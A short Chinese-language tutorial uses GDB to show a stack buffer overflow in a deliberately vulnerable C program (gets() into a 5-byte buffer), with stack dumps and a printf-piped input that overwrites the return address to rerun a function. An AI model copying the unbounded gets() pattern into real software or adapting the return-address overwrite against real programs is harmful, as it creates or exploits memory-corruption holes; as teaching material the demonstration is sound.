用GDB示範Buffer Overflow 的過程

 1 #include <stdio.h>
/*
 * return_input - read one line from stdin into a 5-byte stack buffer and
 *                echo it back.
 *
 * gets() takes no length, so anything longer than 4 characters plus the
 * terminating NUL is written past the end of `array`, onto the saved frame
 * pointer and the return address stored just above it on the stack. That
 * unbounded write is the overflow the GDB session below walks through; a
 * hardened version would use fgets(array, sizeof array, stdin) instead.
 * No parameters, no return value.
 */
void return_input(void)
{
    enum { ARRAY_LEN = 5 };
    char array[ARRAY_LEN];

    gets(array);                   /* unbounded read: the overflow point   */
    printf("%s\n", array);         /* emitted as a puts() call in the disassembly */
}
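/*
 * main - program entry point: call return_input() once and exit with 0.
 *
 * The original listing used the pre-C99 implicit-int form `main()`; an
 * explicit `int main(void)` is what C99 and later require and matches the
 * `mov $0x0,%eax` return value seen in the disassembly.
 */
int main(void)
{
    return_input();
    return 0;
}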

>gdb -q overflow

(gdb) disas return_input
Dump of assembler code for function return_input:
0x0040138c <+0>: push %ebp
0x0040138d <+1>: mov %esp,%ebp
0x0040138f <+3>: sub $0xc,%esp
0x00401392 <+6>: lea -0x5(%ebp),%eax
0x00401395 <+9>: mov %eax,(%esp)
0x00401398 <+12>: call 0x401b1c <gets>
0x0040139d <+17>: lea -0x5(%ebp),%eax
0x004013a0 <+20>: mov %eax,(%esp)
0x004013a3 <+23>: call 0x401b14 <puts>
0x004013a8 <+28>: leave
0x004013a9 <+29>: ret
End of assembler dump.

(gdb) b *0x00401398  //0x00401398 <+12>: call 0x401b1c <gets>
Breakpoint 2 at 0x401398: file overflow.c, line 6.
(gdb) b *0x004013a3  //0x004013a3 <+23>: call 0x401b14 <puts>
Breakpoint 3 at 0x4013a3: file overflow.c, line 7.
(gdb) r

(gdb) disas main
Dump of assembler code for function main:
0x004013aa <+0>: push %ebp
0x004013ab <+1>: mov %esp,%ebp
0x004013ad <+3>: call 0x4018dc <__main>
0x004013b2 <+8>: call 0x40138c <return_input>
0x004013b7 <+13>: mov $0x0,%eax
0x004013bc <+18>: pop %ebp
0x004013bd <+19>: ret
End of assembler dump.

(gdb) x/20x $esp //0x004013b7為return address,$esp=0x28ff14,$ebp=0x0028ff28
0x28ff14: 0x0028ff1b 0x00000026 0x7efde000 0x0028ff28
0x28ff24: 0x004013b7 0x0028ff68 0x004010b9 0x00000001
0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811

 

(gdb) cont
Continuing.

ABCDEDDDDDDDD

 

(gdb) x/20x 0x28ff14
0x28ff14: 0x0028ff1b 0x41000026 0x45444342 0x44444444
0x28ff24: 0x44444444 0x0028ff00 0x004010b9 0x00000001
0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811

 

(gdb) step

 

Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()  //成功改掉return address

====竄改 return address=====

>printf "ABCDEDDDD\xb2\x13\x40\x00" | overflow  //return address 改為 0x004013b2 <+8>: call 0x40138c <return_input>，所以 return_input 被再執行一次，輸出因此出現兩行
ABCDEDDDD?@
ABCDEDDDD?@
